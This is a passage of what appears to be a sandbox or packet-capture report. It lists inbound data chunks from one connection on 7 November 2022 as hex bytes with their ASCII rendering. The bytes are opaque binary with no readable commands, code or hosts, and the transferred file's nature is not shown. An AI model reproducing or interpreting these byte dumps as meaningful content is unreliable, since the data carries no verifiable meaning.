86 9d a6 11 ae 4e 5e f6 00 fc 11 22 1e 9c e1 46 8f 2e 2e c8 Data Ascii: SL:;y-6(%[m`3-":~W_&#$HT'I-Wv<rIC[=6f${:CP]f0;),*3NC&cPrc-<MkPG"Qo0@4O/SN^"F..
2022-11-07 22:49:10 UTC	13113	IN	Data Raw: 4f 0f 17 c6 0f ef 91 52 10 7c 11 c3 4c b6 43 fa 13 5c 69 74 8f 91 d7 76 84 12 85 33 fa 3b ed a4 e4 97 16 cf 1e 51 84 5e cf 12 8c 69 c1 10 a9 2c cc a7 ee 60 87 00 99 42 54 8b 65 6d 99 df 48 f7 b9 ee 50 78 84 49 ef c3 f3 d4 43 78 28 7e 29 db 10 7b a4 6c ce 12 a5 bf 2c e3 12 a9 cd c6 f4 a2 9c 4a cf 48 2f e3 f4 01 de b7 4e cd ba a1 58 d5 51 df 70 98 0b 3b 0d ff b0 5e c6 96 7b 2a ca 3f 92 57 e5 b5 ce a5 7d 73 b2 48 45 8a 74 69 03 5f 81 ca 42 89 92 60 e4 32 7b 48 25 e4 59 cd 5f 24 cd cf 30 a5 12 47 1c 38 23 23 47 3b 69 f8 e1 d7 1a 87 b9 65 98 aa d3 57 64 98 85 d2 dd d3 57 ad 51 dd a5 e0 b9 3d c9 c8 66 11 32 d6 9a 57 3f 1a 2d e5 67 2d 14 f2 2d b6 9b 7f 2c 4c d8 9b cc 88 a8 57 59 88 4d 16 98 10 93 7c 6c b3 f5 fd ba 96 47 33 1d 98 b9 57 3e 85 c7 ad 99 9e 32 f3 69 Data Ascii: OR\|LC\itv3;Q^i,`BTemHPxICx(~){l,JH/NXQp;^{*?W}sHEti_B`2{H%Y_$0G8##G;ieWdWQ=f2W?-g--,LWYM\|lG3W>2i
2022-11-07 22:49:10 UTC	13129	IN	Data Raw: 54 8c be de 81 1b 57 6c b1 00 71 cc fe 85 cb 20 30 3d 90 6f ad 52 c1 1a 7e b0 e5 8c 2a b7 b1 61 5c 7d 73 c5 53 1c 87 a5 04 56 2c f6 b4 aa 17 4e f0 d6 eb 25 1c fb aa bc 13 1c 14 0a fa 17 2c f5 32 3c 96 84 f6 d8 9c 2f d2 db 3a 3d d4 1d 43 fc 24 9d 65 57 1b 4c b4 85 83 3b 04 0b 56 dc dd a5 b8 bb 7b 71 6b 80 16 77 2b d6 02 c5 29 2d 85 e0 5e bc b8 bb bb 43 71 b7 60 c1 1d 72 df 7b ef 0f 98 35 6b 9d 7d e6 ec 67 7f 98 99 98 33 4a 4d e5 58 22 9d 77 f9 2e d7 3f 7e f0 42 5c 39 ce 9a a9 b7 e6 18 3a 66 ce 6a 77 fa c2 68 e9 8a 54 2b 42 38 36 67 4e 2d 77 d2 64 22 92 62 15 2c b4 ab c5 a1 c5 3f 27 85 f2 3e f6 01 89 e2 36 94 61 57 7f ce 8c 7d e4 5a 77 5b b3 4e c3 ed 57 08 7e 40 3d 00 67 69 0b d7 32 4a 84 5a 01 6b e7 bf fe f3 4c 58 c6 c9 3b 13 98 7d fc de f7 5f 5b be 1e e6 Data Ascii: TWlq 0=oR~*a\}sSV,N%,2</:=C$eWL;V{qkw+)-^Cq`r{5k}g3JMX"w.?~B\9:fjwhT+B86gN-wd"b,?'>6aW}Zw[NW~@=gi2JZkLX;}_[
2022-11-07 22:49:10 UTC	13145	IN	Data Raw: ce 20 18 7f 77 fd df d5 79 c0 a9 05 7a dc 81 d4 d6 38 fd dc b8 c6 3d 21 f6 fa 87 6c 15 85 0c b3 74 46 cd 94 8f 82 39 f3 34 cc 6e dc 23 c1 c8 1e 7a 5d cf fa 50 69 b4 6d dd 58 22 b1 ac 6a 62 0c a3 bc 79 6e c1 43 2f 6c 9b f5 0e f3 66 58 ed e3 1f c8 93 76 3d 72 21 e3 5f e7 e1 d9 f8 ee c8 19 27 dd a0 97 ca 8b a8 f8 97 2e 2d 0f d9 89 e8 b6 eb f8 f7 cc 14 8c 3c 7d 74 c0 a0 38 b1 8f 71 be 71 79 9d d7 09 7f c7 e9 40 f2 fa b4 61 fa 85 1d 0d 2b a3 11 1d a8 21 a5 be 49 c8 9f 1f 11 00 a3 8c fd 0d 1d 7f 31 ee 9f e3 c3 97 37 26 52 5d 5f e8 07 e4 06 94 d6 43 e2 f4 d4 dc 93 3b da 84 40 7d 69 0d 70 55 56 4c 2e 41 8b 72 ef 67 2a 93 f5 e6 76 5f 77 07 13 fc d8 72 bf 9f bc 79 6c 34 3d 8c 80 bf 74 b6 ac b4 43 a0 8b ee 12 2e 4c 5c 6a 4d a3 a4 e3 08 ea d7 df 0c da 2f 6c cb bd e7 Data Ascii: wyz8=!ltF94n#z]PimX"jbynC/lfXv=r!_'.-<}t8qqy@a+!I17&R]_C;@}ipUVL.Arg*v_wryl4=tC.L\jM/l
2022-11-07 22:49:10 UTC	13161	IN	Data Raw: ee 82 7c e4 42 fe ea cb ef fe 76 1e e1 e0 f4 00 00 00 e2 f5 80 ea 35 29 1e fc d7 f9 b3 99 ed fd e0 53 6c c4 e9 13 55 90 1b 5f 1c da 35 62 6e 9a 78 9e 98 a6 17 af 76 34 cd 0f f3 11 c5 60 92 85 f1 9b ad 77 94 9b cc ba 3f df b7 57 5a 3a 2f 98 e5 69 6a 7c a5 82 5f 7b 30 de 73 d0 ff 98 2d 91 b5 d6 63 04 3b 34 6e 84 53 d8 65 bc 9b f4 19 9f a8 e8 ce 73 73 67 5c 23 bd ba 36 cb b9 cb 72 1b 3b bb cc 3f f0 1e fe 1b d1 e9 fa cd d8 e2 7d e0 dc ae 83 87 cb 9f ff 61 e9 2c c3 a2 da ba 00 3c 74 09 0c 5d d2 29 dd dd 29 4a 29 8d a4 c0 88 22 29 02 d2 2d 21 21 20 32 74 48 23 2d dd dd 2d 08 d2 22 30 74 37 cc b7 7d ee f7 c3 67 9d cd 59 6b bd 2b 76 1d ef bd 5c 62 f6 44 75 cf 52 33 65 5a b2 a6 9d 47 cf 3f 48 f6 8c 5e 4f 20 2b b5 a5 73 0a 7a da f8 1c 5a 38 de ef af 79 b9 af e3 8a Data Ascii: \|Bv5)SlU_5bnxv4`w?WZ:/ij\|_{0s-c;4nSessg\#6r;?}a,<t]))J)")-!! 2tH#--"0t7}gYk+v\bDuR3eZG?H^O +szZ8y
2022-11-07 22:49:10 UTC	13177	IN	Data Raw: e6 b6 18 32 53 69 8f f5 e2 d9 ed 64 4d 2a 05 8d 66 50 6a 85 14 81 24 9e 54 18 96 cd 9d fa 77 b5 70 d7 d7 fa 54 7b a5 46 8e 6a 2f 9f 48 4a d2 fa 19 96 b8 8a 89 ee a7 fb dd 57 65 98 9b 71 f9 5e b5 da bf 7a ae c8 d0 2f dd 60 ec 2b fb f8 49 ec 51 d7 07 1c b7 eb c1 5f 6f 5d 93 eb b6 79 87 24 bf 3c 8f 1a af 8c 72 78 12 a0 1e d9 09 d5 20 ce c1 33 78 97 8c a6 ec 3b 39 46 56 13 97 b1 7b 25 11 fd a6 7e f6 e9 40 66 72 de 5f 6c 52 11 57 51 e1 e1 e2 71 b6 3c be 15 9b 3d 19 93 ab 60 4a 4a e2 0c d1 92 f9 b2 ee c6 87 b8 8b 50 69 eb 06 05 56 82 9b 33 43 72 5a 46 84 0a 31 0f e5 c0 63 b4 f3 7d cc 94 85 59 14 ab 46 bd 6d df 1b 8e 7a 0e 1e 9f d3 9c 26 4e dc 04 b2 30 b7 e3 69 4c 71 75 2d 44 c1 2d 11 8b 67 10 d5 56 eb b6 05 33 65 c1 6f f5 fb ce 56 11 32 3f de 27 ef 96 50 3c 8e Data Ascii: 2SidM*fPj$TwpT{Fj/HJWeq^z/`+IQ_o]y$<rx 3x;9FV{%~@fr_lRWQq<=`JJPiV3CrZF1c}YFmz&N0iLqu-D-gV3eoV2?'P<
2022-11-07 22:49:10 UTC	13193	IN	Data Raw: e1 5c f4 42 1b 87 ae da 41 27 4d 9c f4 41 54 4d 3c 37 21 5e b7 b5 c8 8e 19 89 42 1a f1 61 62 70 14 b1 da cd 27 11 3f 6c 03 0c fa b4 45 a9 74 e6 83 a0 a7 a2 74 44 d1 6f 59 d9 87 4c c5 86 11 2d 07 1d 75 23 77 fa 1a 7f 6e 52 d2 4e a1 9a 2a 42 57 da 9a 95 e2 c8 51 e2 24 61 22 a5 05 cc 1a 3e a6 55 df d0 e4 93 78 42 11 f8 34 f5 ca fa 0e f3 08 e9 22 fd 01 7d 7b 68 e8 34 61 ec f1 31 92 a4 2f cb 99 bd 46 52 52 3e 56 c6 fe 79 31 5a e7 71 e0 53 45 06 a6 bc 4e 23 b9 af 0a 6d 5d dc ec b3 66 93 0c bb ae 5f 4a 85 d3 fd 07 bb b8 99 bf cd 3d 47 84 3f 7e 17 cb e8 30 7d a2 25 fd b6 4b 1c 92 9b 96 dc 26 88 c4 34 bf a1 2f 74 c9 2a ef b0 f8 31 2f 55 9a 4f a4 e6 e5 ed 44 a2 db 7a 4e 66 63 78 8f 8f 77 5c 16 3a f4 25 83 4d ae a6 b0 cf 6e 6b f7 75 0a d1 8f 09 ee 9b 69 e1 67 4f 66 Data Ascii: \BA'MATM<7!^Babp'?lEttDoYL-u#wnRNBWQ$a">UxB4"}{h4a1/FRR>Vy1ZqSEN#m]f_J=G?~0}%K&4/t1/UODzNfcxw\:%MnkuigOf
2022-11-07 22:49:10 UTC	13209	IN	Data Raw: 41 3f e8 40 4f 22 12 79 7a 89 07 e3 07 76 3e 58 47 22 ef 36 71 58 60 a5 37 0a d8 d1 9d 21 44 9f 21 0a c0 cd 3e 99 1b ec 49 2e 1e fa 8b a1 4e 9b b3 1b af bf 31 ec cc 32 42 7c 8f 6b dd b2 e8 43 75 14 30 55 ba 9a 22 93 c3 d7 fc 7a 5c 85 08 92 fb 4e 49 e1 f4 b6 89 74 86 f8 a0 94 c8 00 f1 13 42 d1 47 19 5e 00 bc e2 5b 1d 72 86 cc bc d7 ed 08 5b 58 7d 01 f3 c9 de be 2f 42 1b e0 09 df 3e 93 67 72 c0 29 9f 1e 87 50 0d 7d bb 50 79 ce 87 c0 3c d3 90 83 a8 ea bc 00 88 ef f8 12 64 c5 09 e3 58 f4 1e 33 de 8e 0c 70 47 ed 91 19 9e 24 9d 58 f1 ff fe 1b 81 94 60 ea dd 6f c8 9b c6 e7 db 65 c6 4a a6 10 ef f2 27 ac 37 57 e5 cf d0 08 dc e0 68 08 e6 cb 22 0f d8 60 7e 00 29 23 fc 02 ff a6 dc 81 14 c4 8a 05 41 a5 ef 91 c8 7c 18 36 c3 b1 2e 03 a0 85 13 37 b8 13 6e b0 44 18 3b 7b Data Ascii: A?@O"yzv>XG"6qX`7!D!>I.N12B\|kCu0U"z\NItBG^[r[X}/B>gr)P}Py<dX3pG$X`oeJ'7Wh"`~)#A\|6.7nD;{
2022-11-07 22:49:10 UTC	13225	IN	Data Raw: bb 3e ac 25 c1 69 07 75 1d 4a f2 a8 c2 e4 6e 7e ea 21 dd cf c2 ed 74 df bc 27 91 1e 15 60 4a 69 6c 21 fb b2 2e 58 da 90 5f ed b4 d1 85 2f 14 57 73 2b 11 ef ac 20 6a 85 fc ba d1 35 f8 f3 fc 1d 9a 49 f5 50 67 f4 c6 45 59 c2 42 d2 29 59 b4 31 aa 27 4d ad 16 4d 70 86 05 c9 25 ea 14 35 12 ad 77 76 ab 2b d9 54 8f 51 9e 30 d1 4c f4 72 d2 91 88 43 cb b2 03 0d 39 bd 9b 81 15 cb 35 a3 af 1d 76 9b ce 52 27 cb 99 f0 8d 7e be 77 f7 6d 06 2d b6 dc 51 eb fb b6 26 57 99 48 c2 71 74 76 ad d9 bf 1d 4b 69 9c 17 6a b4 9a e7 6b fb b3 85 b3 1c 7d c4 c3 14 c5 d1 0f 08 87 97 45 66 2e e7 27 dc 22 7e f4 2c 37 c7 1d cf fe 7e 76 37 14 23 8e cc 8c 39 6c 07 be 4f e6 3f 67 de 15 11 35 02 16 3d d1 0c e7 49 9a 03 4d b3 20 d8 a2 8d 95 5b 0f f6 d7 9c 47 97 33 b7 61 ee 25 0a 11 93 d1 66 9f Data Ascii: >%iuJn~!t'`Jil!.X_/Ws+ j5IPgEYB)Y1'MMp%5wv+TQ0LrC95vR'~wm-Q&WHqtvKijk}Ef.'"~,7~v7#9lO?g5=IM [G3a%f
2022-11-07 22:49:10 UTC	13241	IN	Data Raw: d3 70 5d 9b cc c2 10 22 2c 64 d9 10 7b 3b 03 f4 e4 16 30 61 74 2f dd 8a fb e6 f5 02 31 20 1d 0e db 1a 63 26 a3 46 09 ef ee 49 fb 3c 80 46 44 2a d6 a9 1a 14 a3 df e8 f7 a7 8c 51 08 27 23 56 22 85 af 51 17 9f 4b a2 3d 47 0f 07 f4 46 95 89 a8 18 da cd 12 81 0a 08 54 e2 40 21 08 d7 09 07 5d 4b b8 aa 27 e7 64 79 2f 40 f4 1a 63 dc 25 26 e5 70 a8 e8 51 79 a7 ae a9 9f 3a 03 7a d9 35 d5 db b5 0e 9c 1a 27 1f 32 ea 15 6c dc d9 8f a4 b0 13 54 e1 1a 59 b7 4f 55 d5 a4 64 e2 9d 59 36 1e 3c c3 1a a2 75 0f 2c e5 00 a4 d2 59 d5 35 af 93 23 62 a0 db 55 a0 2a ad 83 6f ea 1a 80 35 f3 2b e5 68 74 79 6f 90 b8 e2 89 52 2a b4 13 67 dd 91 cf 7d 5f 11 5c e9 58 ee 10 8b 3c 03 2c d7 60 c7 04 8d 88 af 28 37 e1 10 35 e2 2f cb 10 fd b1 4f db 33 a2 73 be 8d 20 3a 14 de 1b ed 1f 44 96 83 Data Ascii: p]",d{;0at/1 c&FI<FDQ'#V"QK=GFT@!]K'dy/@c%&pQy:z5'2lTYOUdY6<u,Y5#bUo5+htyoR*g}_\X<,`(75/O3s :D
2022-11-07 22:49:10 UTC	13257	IN	Data Raw: 79 c9 20 e5 a8 3e ef 55 6a 16 a8 8a 51 1a a4 d0 b4 cd 6f 4c eb da 40 18 02 f1 01 b0 3d 1b c8 5e 0f 3f 24 a9 75 6a 02 76 61 44 61 aa 23 f1 95 df 39 36 f6 f8 8e 51 ac f4 5c a8 86 f1 2c 8d e9 b5 18 66 ed 09 3a c5 a6 23 55 3f 8a 7a 02 f3 4a 00 c1 00 57 b9 c8 ae 20 f4 7d 68 be 83 17 31 8f 84 23 ed 20 40 32 cb e5 ee 87 0a b5 4f f0 50 a9 3e 6a 89 19 4a 25 3e c6 5a 5c a2 81 e6 b2 b6 f8 30 09 33 f1 dc bc 9b af 3c 89 89 c9 5c ee db 7e 48 c8 64 c9 8f e2 54 5e 7f be 54 f9 41 7b 46 78 34 de 43 a8 d0 50 16 28 c9 11 d1 e9 79 1a a6 7a 92 e2 64 e1 16 e3 8a ae b3 df 3a 1d 5d a4 74 95 1d 8b 51 f2 21 c8 d5 e9 ce 6c f8 93 15 ca 64 9d 5d e6 50 30 21 07 18 c4 fe a5 34 a2 f4 fa 85 17 eb 15 ee c7 e9 0c 71 a2 65 7c f4 51 03 dd 60 66 50 23 6b 16 47 12 48 8e 16 d7 ac 6c 1c d8 37 02 Data Ascii: y >UjQoL@=^?$ujvaDa#96Q\,f:#U?zJW }h1# @2OP>jJ%>Z\03<\~HdT^TA{Fx4CP(yzd:]tQ!ld]P0!4qe\|Q`fP#kGHl7
2022-11-07 22:49:10 UTC	13273	IN	Data Raw: 08 70 bf f6 d5 38 a7 c1 c5 3c 94 79 2d 97 4a a6 ce bc 1b 45 56 f5 16 29 b9 95 32 99 b7 06 a5 f8 64 b4 01 a5 f5 8f 5d 85 2a c8 61 90 1c 40 f6 1c b7 d9 e9 c8 5c b4 8f 15 23 fd e6 c8 94 6f 54 9b e2 7a bf 6a 3d 4b ae 0d 29 fc 4a 76 5e 2d 36 0e cd 68 5f 9b 0f c7 49 5d 4f e2 bf 27 73 b3 38 de 51 bc fe 71 84 f6 7d 2a 3c f0 24 9f 9d 96 e4 b8 6b 71 68 e2 1f c1 14 62 d8 81 6e 7d 5c 64 7b 4b ff 33 4f 2e b0 16 f2 e9 9f 0b c5 51 ce b4 ba e3 bb 7e ea 9f cf 7a 5e 49 5e 17 dc fc a6 20 e4 fd f5 f2 a5 cd d4 f7 77 3e fb 2b ee 94 6f ed 8f 2a 1e 2c 2e 0a e3 c2 84 1b 4e 13 d8 c8 bf 4c 16 74 cd c6 ac 5a 0f 3b 5e 3c 31 e4 f3 74 fc f0 ce d5 c3 6d 5b a1 5f 6e f5 f7 b3 fd d7 35 df 78 c4 34 f3 69 7e ad b9 36 5c 73 86 06 fa 92 71 e1 d0 9f 81 62 8a 8f 5c f4 45 f2 d5 4b c3 cb 72 8a 7f Data Ascii: p8<y-JEV)2d]a@\#oTzj=K)Jv^-6h_I]O's8Qq}<$kqhbn}\d{K3O.Q~z^I^ w>+o*,.NLtZ;^<1tm[_n5x4i~6\sqb\EKr
2022-11-07 22:49:10 UTC	13289	IN	Data Raw: d8 e6 15 ff c2 28 4e 2b 94 e2 bf dc 26 17 13 59 75 34 f0 57 29 15 bc 9a e2 bc 94 99 5e 98 12 59 fc 30 80 b5 c7 12 e5 a4 4a 0b 3c 46 55 47 18 e0 7c dd 9b 83 ca 78 9c 29 85 fd 55 82 b5 da 7e 61 f7 5b 3a 7a 44 42 b7 92 f2 8b f5 a9 e2 0c e4 07 d3 d7 6f 94 ba ba 9b a4 7c 02 ab 9f 0c cd 95 bb a3 07 b1 37 f3 7f 88 74 84 6b bf d7 08 31 4e 6e 96 df b4 62 6a 27 66 34 41 18 af d5 3e 79 a0 ad fb bc df c7 8f 44 34 bc c8 38 37 d6 e4 a7 cf c3 c9 a1 f6 3e 7f b2 28 a0 4e d3 fd c7 ed a7 cf c1 c0 12 f2 61 0d fd 77 72 a3 85 74 96 84 e5 74 bf 45 1e bc 5a 1a 7c 75 3e 15 55 c4 6a 3f 25 81 57 5e cf 72 97 da 56 ad 15 f5 50 51 ab 58 06 fe 56 c3 4b e0 57 73 7e 79 8b f4 4d 7f 65 bc aa 98 25 67 e0 62 d7 c5 76 49 f2 f1 c0 26 9c c1 c6 59 91 5d a7 d9 b7 b0 bf bf f7 d1 ae c4 8e 06 28 0d Data Ascii: (N+&Yu4W)^Y0J<FUG\|x)U~a[:zDBo\|7tk1Nnbj'f4A>yD487>(NawrttEZ\|u>Uj?%W^rVPQXVKWs~yMe%gbvI&Y](
2022-11-07 22:49:10 UTC	13305	IN	Data Raw: b5 b8 a8 60 0e f0 49 5f c9 de aa 8a f4 88 5f 6f 68 3e 09 0e 2c 7e c5 45 1c d8 09 74 80 dd 51 f0 ff 19 78 df 91 ac 35 1f 08 8b 1f 6a fd 50 4a c0 23 3c 90 ea eb ab 36 06 8b 93 5d 72 83 0e 5a 63 02 00 39 2f b2 f4 2a 32 75 2f 2c f0 5a 70 c7 93 b0 79 e3 2c ee ef 24 54 9e 75 02 29 2e a2 60 dd fe bb ed 6e 69 70 15 80 8d 37 d0 16 f6 2e 24 0e c6 0e d2 b8 74 d6 93 ff 85 87 a6 70 fd 26 67 18 f9 8b 83 84 57 5b 6c 5d 03 9b f4 1e b7 7f 46 89 ff 02 49 a6 87 5d 8d e0 a6 ff 33 34 5d 79 8c e3 22 39 a8 00 80 93 40 25 20 a1 99 33 4f a8 fe 13 32 6d 40 70 d6 17 eb a0 70 46 e7 03 4d af 9b 2a 40 5a 63 fd 27 62 67 7c 51 4d 9e 4f 87 d3 44 1b ba ff 1f d4 ec fd 72 37 7f 90 ff 77 ce 84 f1 6f 18 58 2c 6d 67 af 02 86 74 11 8f c2 10 f2 93 51 13 f9 31 c6 4d bd f3 44 69 d1 0d 95 e3 26 33 Data Ascii: `I__oh>,~EtQx5jPJ#<6]rZc9/2u/,Zpy,$Tu).`nip7.$tp&gW[l]FI]34]y"9@% 3O2m@ppFM@Zc'bg\|QMODr7woX,mgtQ1MDi&3
2022-11-07 22:49:10 UTC	13321	IN	Data Raw: db dc c9 37 4f 2a 1c 05 6b 71 96 0b 87 70 b7 7c 85 0e e3 c7 c1 66 1b 46 c0 0f e5 63 ea 3c 59 dd cf bf f3 58 2a 21 04 ef d0 dc df 8b 30 45 d3 f7 3b 04 31 ef 75 c2 df 9b 50 1f b4 69 18 98 6b 8a 67 5e af bc 5e 9c 27 5b b4 7b 2a 74 09 4c 72 ca b3 84 1b 8f 02 f2 fe d5 03 1b f2 1c 45 5e ed c1 2e 1a b6 48 a8 6a 86 c1 60 9d ba f4 00 95 09 56 f1 38 b1 d0 6b 5e 90 f7 27 54 80 bb 13 31 4a 00 53 99 6e e8 5b da c7 fb 7e 9b da 6b bb bb 11 08 ea 67 46 50 66 1e 27 00 7d 01 17 f4 af c1 16 d0 b5 7c 2c 15 6a f5 16 f7 0f 39 58 5b b6 de 8b 4e 8a 6f 44 d5 ca d2 b5 e9 35 86 81 b0 57 dc 1d 20 f0 d9 2d f4 d5 4e 59 4a fb e5 ab 48 db ca 67 5a f9 38 78 3a a9 cb 01 39 ec 90 21 b9 d8 90 ee c2 e6 36 f5 e6 d7 b5 d5 86 db 1b d7 57 82 72 1d d1 7e d1 29 64 14 e7 a3 d0 37 5b 1d 10 82 f9 d3 Data Ascii: 7Okqp\|fFc<YX!0E;1uPikg^^'[{*tLrE^.Hj`V8k^'T1JSn[~kgFPf'}\|,j9X[NoD5W -NYJHgZ8x:9!6Wr~)d7[
2022-11-07 22:49:10 UTC	13337	IN	Data Raw: 10 08 3b 50 50 18 30 98 1a 16 8d a4 cd ff 49 bf c6 c6 0b a6 8e 36 0a 58 36 9d 29 e5 62 16 4d 44 25 00 b7 58 9e e9 d1 a4 6f 00 08 46 76 30 f4 ba c1 49 8b b9 39 81 c1 c4 cd ff ff 5a 35 0f bb 03 70 0f b6 6b 72 66 45 cb 0e 2d b6 41 bc 50 4b 85 1e 49 0f 60 3f 39 b6 cc 3b fe ff 03 00 41 c0 34 e2 be cd d0 be 2c 35 19 c1 2f 3a 1a c6 d5 66 8f 7e b6 d6 e7 49 3a f1 8d 5c 2d be d2 88 e2 5d d4 5f 32 b6 aa da 44 32 30 07 41 f7 76 88 d3 99 86 58 0d da af 56 e3 d3 4a 23 81 da cc 60 66 44 10 c0 d5 45 56 98 ff be 1f 9e 49 81 ce 32 00 00 ce ca cc 2b 40 ee de 05 e0 fd 80 b7 33 c5 23 06 7b ce 27 07 2c fc 0f a9 ad fe c1 c8 3d e9 a7 d8 42 02 06 7e a6 7c 00 00 b8 36 0a 7b 17 5e 15 f0 3b f8 0f 91 fe 79 c9 89 5d 34 9c f6 e0 b1 d1 d7 62 85 da ff 34 b3 e9 0f 51 3c 74 f0 52 1e 38 fb Data Ascii: ;PP0I6X6)bMD%XoFv0I9Z5pkrfE-APKI`?9;A4,5/:f~I:\-]_2D20AvXVJ#`fDEVI2+@3#{',=B~\|6{^;y]4b4Q<tR8
2022-11-07 22:49:10 UTC	13353	IN	Data Raw: 71 00 57 6d 83 2e 3d 80 1b 07 99 f9 d9 e6 56 f2 45 0a fc 56 30 cf 13 20 62 16 78 3e da ff 48 08 41 16 ca 2f 7b 00 76 8e 89 63 f0 6e 09 70 bb 4d 70 81 ee f3 cd ff ff b9 5c 1d 74 60 bf fa 50 93 bb ee 7a 77 ce 2c 06 c1 87 f2 46 51 27 0a e9 6f a1 ae ff 26 8b 65 af b4 85 36 bf 5a 05 5d c5 61 9e 26 9f 12 73 ee 90 ee 2c 07 2e ce 42 74 3f ea fb e9 6f fa 2e c3 d1 0d 71 ae e7 b9 ae 44 11 1c 5a 4e cf 1f 27 ee d1 fb 73 97 26 9b 2d 6f 60 12 10 ac f9 5f fa 03 0b 74 2a fd 1d 1d ff bd d4 bb 87 bb ce 09 8d d6 6b da 56 7e e5 2b 35 d8 cc 79 a0 82 de 40 f3 bc ee ab ae 12 d1 ed 00 94 49 b7 6d 90 ff f5 3e a9 ad 11 2b f1 27 c4 37 7f df b5 fc 7e fe 88 c8 11 67 59 ab 23 df 73 7b 41 49 06 63 62 be 3a e8 d6 a6 0b 91 60 47 56 c6 e4 7d fa 76 63 be 52 54 1f 68 9b 0f 7b 0d 84 0a b6 1c Data Ascii: qWm.=VEV0 bx>HA/{vcnpMp\t`Pzw,FQ'o&e6Z]a&s,.Bt?o.qDZN's&-o`_t*kV~+5y@Im>+'7~gY#s{AIcb:`GV}vcRTh{
2022-11-07 22:49:10 UTC	13369	IN	Data Raw: f1 8f 6e a2 0b 1b ba c2 49 6b 41 8d c3 46 24 c4 57 94 3c 13 4b 27 27 0b 9d 5b 40 01 fe 1e de 48 7d 40 76 19 0c f6 ed 63 05 b7 a2 0a 79 9b 5e f7 d3 d8 c3 82 17 07 5e c0 48 49 1f a0 02 ab 35 fa ea 70 af da 66 54 18 11 1e 2d 0f d6 19 6e c9 e3 2e d3 23 58 98 80 89 b5 28 cb 8b cd 8d af 8b d2 cc 3c 2b ae ea ee 75 43 32 22 04 f3 56 f6 aa da 30 94 bf 7e 05 07 e1 dc ec 58 98 29 2e b0 69 c7 b2 f2 07 42 77 20 40 61 b2 77 b4 16 39 c8 ff 51 dc ab d6 cd fd 16 76 40 35 22 4c 0c 10 a6 55 66 6c 43 4d b4 0d 00 e3 9e e4 c7 7d cf da a5 18 31 18 91 e6 09 1c 99 d0 18 57 fe fb 3f fe 60 b2 82 fb 7c 39 00 e1 be 6d b0 e0 4a 5b bc 60 d4 ff 18 80 af 9e 50 aa d2 68 18 a1 2f 0c 00 18 ff 71 cc ca fb a9 bd 21 39 e8 83 04 03 10 6b 87 4e ea 49 28 04 00 cb e7 a0 89 70 bf 1c e3 29 aa 21 da Data Ascii: nIkAF$W<K''[@H}@vcy^^HI5pfT-n.#X(<+uC2"V0~X).iBw @aw9Qv@5"LUflCM}1W?`\|9mJ[`Ph/q!9kNI(p)!
2022-11-07 22:49:10 UTC	13385	IN	Data Raw: 22 59 94 a2 90 36 92 12 d8 ed 28 84 11 fb 96 b3 cd a3 17 63 8a a1 d5 d8 b3 01 92 15 d7 82 4e 1c b8 47 28 f5 e1 d7 1d ef 98 bb 93 02 0b da f1 c5 c3 d9 67 e2 2d de 18 d7 83 69 99 ab cf 82 6c 47 d2 5e f4 b6 39 af 2b bb 85 ac b3 7d 9b e6 79 ac ed a7 a8 a2 26 8f de 45 7a 6e c1 a2 da f5 80 14 0a 54 97 c2 64 49 f4 31 2e 6e 85 27 c3 d2 2c 9a e7 7d 5f b6 5d 90 21 7f e8 71 fa a7 0e df 2b eb 5f a8 51 c0 86 e7 23 27 2e 9b c8 bf 65 c9 b3 f4 87 da 53 11 70 77 fa 3e 33 43 f1 22 b9 d9 c7 a4 e6 f8 ee eb 90 25 f7 55 1f 54 98 1c c8 a2 fa 84 f7 11 42 91 bc 38 ec 71 53 de df 3b 0e e9 d5 57 38 0a fb 36 78 e4 6e e9 77 c7 57 c3 83 3f f7 be 9f b4 16 25 9b 70 6c eb 00 3f fd cd 6b a6 1c b4 1a ee 09 5f 3e d8 ca a4 75 72 4b 36 7e 2c 18 6b ab d3 98 e3 10 7c b2 f9 8e e1 38 78 2d 15 54 Data Ascii: "Y6(cNG(g-ilG^9+}y&EznTdI1.n',}_]!q+_Q#'.eSpw>3C"%UTB8qS;W86xnwW?%pl?k_>urK6~,k\|8x-T
2022-11-07 22:49:10 UTC	13401	IN	Data Raw: c0 d0 6b 6c f3 40 1f 16 36 0f 28 fd 30 ce 02 58 ee 2f ed 02 42 14 1b ed 1f c1 bd a8 df 13 74 59 38 f2 38 08 fc ce 8d a1 a5 75 49 ac 9f fe c8 86 1b e3 5c a8 fe f1 82 b6 2c 48 3a 4d 67 19 49 1a dd 8d 50 e6 0e b8 32 fb df d0 42 fb 48 60 72 38 e8 4b 38 f6 a1 46 73 28 f9 00 96 07 d4 64 80 06 65 24 b6 0f 92 b5 f9 a5 61 0b 5c 01 7c 9c f0 2b 2a de a7 d7 d1 5a 6c e2 cf 13 ed d8 d7 93 b5 e5 bf e8 22 bb e1 69 e4 88 f2 7e e3 16 85 26 63 9c a3 91 57 37 20 49 71 ad 3c c5 d7 c9 87 2b 5f 2e 9d af e8 5f c6 f2 b6 f9 7d 43 ba 99 19 e4 10 97 28 9c c2 7e 37 ec cf c3 9d f1 85 13 f5 15 ab 7e d0 34 c7 98 ee 5e fc a8 03 17 ef f2 74 35 ce 4a a8 04 d9 7c 15 eb 4c 54 c5 33 c6 e6 21 23 dd ae ff 25 0f 9f 3d 29 9c 0a 37 6a 64 b2 a7 6c 7d 81 d4 7c bd 85 80 20 9e 75 a2 41 45 76 30 e7 d9 Data Ascii: kl@6(0X/BtY88uI\,H:MgIP2BH`r8K8Fs(de$a\\|+*Zl"i~&cW7 Iq<+_._}C(~7~4^t5J\|LT3!#%=)7jdl}\| uAEv0
2022-11-07 22:49:10 UTC	13417	IN	Data Raw: d4 35 5c 7a 66 d4 02 c3 30 54 7f 4f 98 df aa 43 75 97 99 4d e0 32 27 32 7f 73 75 29 a3 1f 37 00 7b 59 de 00 1b d1 7e 38 93 e0 c2 38 c7 49 22 dc 7f fb 9c a9 af 5f 00 93 54 06 08 14 ef f1 8e 82 4c 93 54 d9 82 66 93 19 f4 73 6e df 50 99 ae 6a b8 16 aa 7a 28 de df 34 81 cb 4d 94 61 fc 30 ef ae 0c 1e 07 5c f5 fa 8a f4 70 4f 83 de 97 21 98 82 aa ca ab 47 e3 26 d3 8d 99 c3 84 e7 57 4f c7 a3 d8 7b 57 66 b3 8d 17 8c 26 47 a0 21 a6 4e b2 4b a7 84 06 00 ce 8b 4d 69 2f 4c f0 b4 f7 a7 f3 a6 7f 35 6b b8 86 34 a1 ad b8 2d bb 51 bf cf 19 09 6c 46 58 66 c5 99 55 2e a3 75 66 68 71 c4 fb 76 0f 82 72 bc c3 2e cd 55 be 17 62 5c 92 57 da 11 6f 33 a5 d8 4c 69 70 41 70 0c 4d b3 